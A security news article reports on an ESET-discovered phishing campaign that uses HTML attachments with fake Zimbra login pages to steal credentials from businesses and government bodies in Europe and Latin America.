A long-running phishing campaign targeting small- to medium-size businesses and government entities is successfully snaring account credentials belonging to users of the Zimbra Collaboration software platform.
The campaign, carried out by an unidentified threat group, has been active since at least April and has hit targets in several countries in Europe and Latin America.
It was discovered by ESET researcher Viktor Šperka, who blogged about the company’s findings on Thursday.
“Despite this campaign not being so technically sophisticated, it is still able to spread and successfully compromise organizations that use Zimbra Collaboration, which remains an attractive target for adversaries,” Šperka wrote.
The platform’s attractiveness to threat actors is due to an expectation that organizations using it tended to have lower IT budgets and are therefore likely to have less sophisticated security measures in place.
Users duped by fake Zimbra login page
The campaign involves sending targets a malicious email purportedly warning of an account deactivation, email server update, or a similar issue. The email includes an attached HTML file which, when opened, presents the user with a fake Zimbra login page. The page is customized with the name and logo of the victim’s organization.
The "Username" field of the login form is pre-filled in with the target’s details “which makes it appear more legitimate,” Šperka said in his post.
Credentials submitted on the fake page are collected from the HTML form and sent to a server controlled by the threat actor.
“Then, the attacker is potentially able to infiltrate the affected email account,” Šperka said.
“It is likely that the attackers were able to compromise the victim’s administrator accounts and created new mailboxes that were then used to send phishing emails to other targets.”
Including a malicious link in an HTML file, rather than placing it in the body of the email, made it easier to circumvent reputation-based antispam policies, Šperka said.
“Adversaries leverage the fact that HTML attachments contain legitimate code, and the only telltale element is a link pointing to the malicious host.”
Humans are (often) the weakest link
“The campaign observed by ESET relies only on social engineering and user interaction; however, this may not always be the case,” he said.
In March, Proofpoint described another attack against Zimbra Collaboration instances where threat group Winter Vivern used a known vulnerability (CVE-2022-2792) to target webmail portals of NATO-aligned governments in Europe.
Last month, EclecticIQ researchers identified a spearphishing campaign that had been running since January and was exploiting Zimbra and Roundcube email servers to target government organizations.
Šperka said that campaign was similar to the one he discovered. “The main difference is that the HTML link leading to the fake Zimbra login page is located directly in the email body.”
In the latest campaign, ESET telemetry indicated the greatest number of targets were located in Poland, followed by Ecuador and Italy. Organizations in Ukraine, Italy, France and the Netherlands were also targeted.
“Target organizations vary: adversaries do not focus on any specific vertical with the only thing connecting victims being that they are using Zimbra,” Šperka wrote.